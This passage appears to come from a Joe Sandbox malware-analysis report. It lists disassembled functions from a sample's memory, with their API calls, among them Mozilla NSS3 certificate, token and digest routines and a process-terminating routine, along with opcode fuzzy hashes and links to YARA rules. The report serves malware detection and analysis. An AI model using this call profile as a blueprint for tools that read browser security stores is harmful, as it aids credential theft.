                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                          • String ID:
                                                                                          • API String ID: 2288138528-0
                                                                                          • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                          • Instruction ID: e0537b8d95fc111ca70eba74ea6549f68015a82006c4e5bee8d18af76be841df
                                                                                          • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                          • Instruction Fuzzy Hash: E431B8B69002916BDB009E64ED45ABE3769AF4521DF140130ED19ABB91EF31E918C7A3
                                                                                          Function 6CB46C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB46C8D
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB46CA9
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB46CC0
                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CC68FE0), ref: 6CB46CFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                          • String ID:
                                                                                          • API String ID: 2370200771-0
                                                                                          • Opcode ID: f11fe4c15b361d57f5ca02ced62dedea434367e93f181110d5ed9b4b2d36823f
                                                                                          • Instruction ID: acb4bbb14cadcfee9f1c72eb0b96292528496d6cb7b76202505c53cafff0e901
                                                                                          • Opcode Fuzzy Hash: f11fe4c15b361d57f5ca02ced62dedea434367e93f181110d5ed9b4b2d36823f
                                                                                          • Instruction Fuzzy Hash: 8531A1B5A042169FDB08CF65C881ABFBBF9EF45248B10843DD905D7705EB319905CBA1
                                                                                          Function 6CC54F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CC54F5D
                                                                                          • free.MOZGLUE(?), ref: 6CC54F74
                                                                                          • free.MOZGLUE(?), ref: 6CC54F82
                                                                                          • GetLastError.KERNEL32 ref: 6CC54F90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$CreateErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 17951984-0
                                                                                          • Opcode ID: 0d03d81b0ce1ea18365f0eb1add24074412bbd4ecc4227fbfdd3ac171b80a846
                                                                                          • Instruction ID: 5b6da091f8ccc6cbd1f1a98bde58eac31190d4e251ca6594ec66f4c0375491be
                                                                                          • Opcode Fuzzy Hash: 0d03d81b0ce1ea18365f0eb1add24074412bbd4ecc4227fbfdd3ac171b80a846
                                                                                          • Instruction Fuzzy Hash: C53134B5A002094BEB01CF6DDC85BDAB3B8FF45398F440229E815A7681EB35A93586A5
                                                                                          Function 00418F70 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00418F8B
                                                                                            • Part of subcall function 004187F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00418FBE,00000000), ref: 004187FB
                                                                                            • Part of subcall function 004187F0: HeapAlloc.KERNEL32(00000000,?,?,00418FBE,00000000), ref: 00418802
                                                                                            • Part of subcall function 004187F0: wsprintfW.USER32 ref: 00418818
                                                                                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041904B
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419069
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00419076
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 396451647-0
                                                                                          • Opcode ID: 154a52856db1a36c13a1087e07be06801474524f1d0650fdf17c0744cb15a30d
                                                                                          • Instruction ID: 3daad27826ff673201e4cbb303e81af6821d19ef8fccaa22ba62c435337ce2e5
                                                                                          • Opcode Fuzzy Hash: 154a52856db1a36c13a1087e07be06801474524f1d0650fdf17c0744cb15a30d
                                                                                          • Instruction Fuzzy Hash: 02316D71E01208AFDB24DFE0CD49BEDB775AF48304F104059F606AB294DBB8AE85CB55
                                                                                          Function 6CBB6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6CBB6E36
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBB6E57
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6CBB6E7D
                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6CBB6EAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                          • String ID:
                                                                                          • API String ID: 3163584228-0
                                                                                          • Opcode ID: b4ec9566c191e8727d8c45a159c87c0b7b56c16f889c5f91e89cae00caea661f
                                                                                          • Instruction ID: 971e35dec99dc97cd35cb165674ef66c7a962310bfbeb60a73569aa023115cdb
                                                                                          • Opcode Fuzzy Hash: b4ec9566c191e8727d8c45a159c87c0b7b56c16f889c5f91e89cae00caea661f
                                                                                          • Instruction Fuzzy Hash: 5B319372610592EFDB185F34DC043BAB7A4EB0531AF14063CE499E6A80EF31BD54CB92
                                                                                          Function 6CB84FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CB8B60F,00000000), ref: 6CB85003
                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CB8B60F,00000000), ref: 6CB8501C
                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CB8B60F,00000000), ref: 6CB8504B
                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6CB8B60F,00000000), ref: 6CB85064
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                          • String ID:
                                                                                          • API String ID: 1112172411-0
                                                                                          • Opcode ID: 4dd2e5f6dcc8d8e77f356c053f045eee7fd605e70a5e92596f19255de9c22dbd
                                                                                          • Instruction ID: 953387204aa80ff20e40608fd0b4026ca87d0982725912c23449b0fef32d8e32
                                                                                          • Opcode Fuzzy Hash: 4dd2e5f6dcc8d8e77f356c053f045eee7fd605e70a5e92596f19255de9c22dbd
                                                                                          • Instruction Fuzzy Hash: AC3128B4A05646CFDB00EF68D48466ABBF8FF08344F108529D85AD7700E730E894CBD2
                                                                                          Function 6CBC0C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_DigestOp.NSS3(?,?,00000004), ref: 6CBC0C43
                                                                                            • Part of subcall function 6CB6DEF0: TlsGetValue.KERNEL32 ref: 6CB6DF37
                                                                                            • Part of subcall function 6CB6DEF0: EnterCriticalSection.KERNEL32(?), ref: 6CB6DF4B
                                                                                            • Part of subcall function 6CB6DEF0: PR_SetError.NSS3(00000000,00000000), ref: 6CB6E02B
                                                                                            • Part of subcall function 6CB6DEF0: PR_Unlock.NSS3(?), ref: 6CB6E07E
                                                                                          • PK11_DigestOp.NSS3(?,?,00000008), ref: 6CBC0C85
                                                                                          • PK11_DigestOp.NSS3(?,?,?), ref: 6CBC0C9F
                                                                                          • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6CBC0CB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                          • String ID:
                                                                                          • API String ID: 3186484790-0
                                                                                          • Opcode ID: 6c3213f7969afd42d348984cb721e0596f6dd9c3a0de232b66fb82b039376cdd
                                                                                          • Instruction ID: a8e40853f1d42aa7a9447e1b72c2da5fed8486f72ceb25f871cc130472224c22
                                                                                          • Opcode Fuzzy Hash: 6c3213f7969afd42d348984cb721e0596f6dd9c3a0de232b66fb82b039376cdd
                                                                                          • Instruction Fuzzy Hash: EC21D6716042C69FCB01CB79E805B9BBBA4AF65204F0981A9E9485F752E721D928C7E3
                                                                                          Function 6CBB2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6CBB2E08
                                                                                            • Part of subcall function 6CBA14C0: TlsGetValue.KERNEL32 ref: 6CBA14E0
                                                                                            • Part of subcall function 6CBA14C0: EnterCriticalSection.KERNEL32 ref: 6CBA14F5
                                                                                            • Part of subcall function 6CBA14C0: PR_Unlock.NSS3 ref: 6CBA150D
                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6CBB2E1C
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CBB2E3B
                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBB2E95
                                                                                            • Part of subcall function 6CBA1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB488A4,00000000,00000000), ref: 6CBA1228
                                                                                            • Part of subcall function 6CBA1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBA1238
                                                                                            • Part of subcall function 6CBA1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB488A4,00000000,00000000), ref: 6CBA124B
                                                                                            • Part of subcall function 6CBA1200: PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0,00000000,00000000,00000000,?,6CB488A4,00000000,00000000), ref: 6CBA125D
                                                                                            • Part of subcall function 6CBA1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBA126F
                                                                                            • Part of subcall function 6CBA1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBA1280
                                                                                            • Part of subcall function 6CBA1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBA128E
                                                                                            • Part of subcall function 6CBA1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBA129A
                                                                                            • Part of subcall function 6CBA1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBA12A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                          • String ID:
                                                                                          • API String ID: 1441289343-0
                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                          • Instruction ID: 3445afc449c55ad4959d36c88a6a53465f20d232615151f6f720d86be33a95de
                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                          • Instruction Fuzzy Hash: C921C2B5D143C58BEB00CF559D48BBA3664EF9130CF150269FD086B652FBB1E6988293
                                                                                          Function 6CB6ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CERT_NewCertList.NSS3 ref: 6CB6ACC2
                                                                                            • Part of subcall function 6CB42F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB42F0A
                                                                                            • Part of subcall function 6CB42F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB42F1D
                                                                                            • Part of subcall function 6CB42AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB40A1B,00000000), ref: 6CB42AF0
                                                                                            • Part of subcall function 6CB42AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB42B11
                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6CB6AD5E
                                                                                            • Part of subcall function 6CB857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB4B41E,00000000,00000000,?,00000000,?,6CB4B41E,00000000,00000000,00000001,?), ref: 6CB857E0
                                                                                            • Part of subcall function 6CB857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CB85843
                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6CB6AD36
                                                                                            • Part of subcall function 6CB42F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB42F65
                                                                                            • Part of subcall function 6CB42F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB42F83
                                                                                          • free.MOZGLUE(?), ref: 6CB6AD4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                          • String ID:
                                                                                          • API String ID: 132756963-0
                                                                                          • Opcode ID: 5bc8f1f5ee3f482d593cd4a5f470832d7ed0c7bc06f07a5a97b2896fb60547ad
                                                                                          • Instruction ID: f955b84e1c8a153350ad9ea8afcc190906f3a421ffa04b3eb1e3e6aa5e75c281
                                                                                          • Opcode Fuzzy Hash: 5bc8f1f5ee3f482d593cd4a5f470832d7ed0c7bc06f07a5a97b2896fb60547ad
                                                                                          • Instruction Fuzzy Hash: 4A21D5B1D002649BEF10DF65D8055EEB7B4EF05218F458068DC09BBB01FB31AA59CBE2
                                                                                          Function 6CB9ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CB9F0AD,6CB9F150,?,6CB9F150,?,?,?), ref: 6CB9ECBA
                                                                                            • Part of subcall function 6CBA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB487ED,00000800,6CB3EF74,00000000), ref: 6CBA1000
                                                                                            • Part of subcall function 6CBA0FF0: PR_NewLock.NSS3(?,00000800,6CB3EF74,00000000), ref: 6CBA1016
                                                                                            • Part of subcall function 6CBA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB487ED,00000008,?,00000800,6CB3EF74,00000000), ref: 6CBA102B
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CB9ECD1
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CB9ED02
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA116E
                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CB9ED5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2957673229-0
                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                          • Instruction ID: 2bc2fab35a1af798936a1d0061582bbcfd241b5d7a1a6ffabdb21d24e5ec706d
                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                          • Instruction Fuzzy Hash: EC21D4B59007D29BE700CF25D944B5AB7E4FFA5308F15C226E81C87661EB70E594C6D1
                                                                                          Function 6CBCED10 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBCED34
                                                                                          • realloc.MOZGLUE(?,?), ref: 6CBCED5D
                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6CBCED74
                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • memset.VCRUNTIME140(?,?,?), ref: 6CBCED97
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemsetrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 2992043971-0
                                                                                          • Opcode ID: 84b79d39650bd7ad97b2ccadfefd440bed9669661a522f5eb0d68cdbb281edc7
                                                                                          • Instruction ID: fa60c5d23d0ca8a081e722e367369dc058bdd029be2828a3cd16b11fb11740ae
                                                                                          • Opcode Fuzzy Hash: 84b79d39650bd7ad97b2ccadfefd440bed9669661a522f5eb0d68cdbb281edc7
                                                                                          • Instruction Fuzzy Hash: F411A0B1B047E6EBEB109E65DC86B5AB7A8EF0035DF244525ED1982A40E730E464C7F3
                                                                                          Function 6CBCEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CBB7FFA,?,6CBB9767,?,8B7874C0,0000A48E), ref: 6CBCEDD4
                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CBB7FFA,?,6CBB9767,?,8B7874C0,0000A48E), ref: 6CBCEDFD
                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CBB7FFA,?,6CBB9767,?,8B7874C0,0000A48E), ref: 6CBCEE14
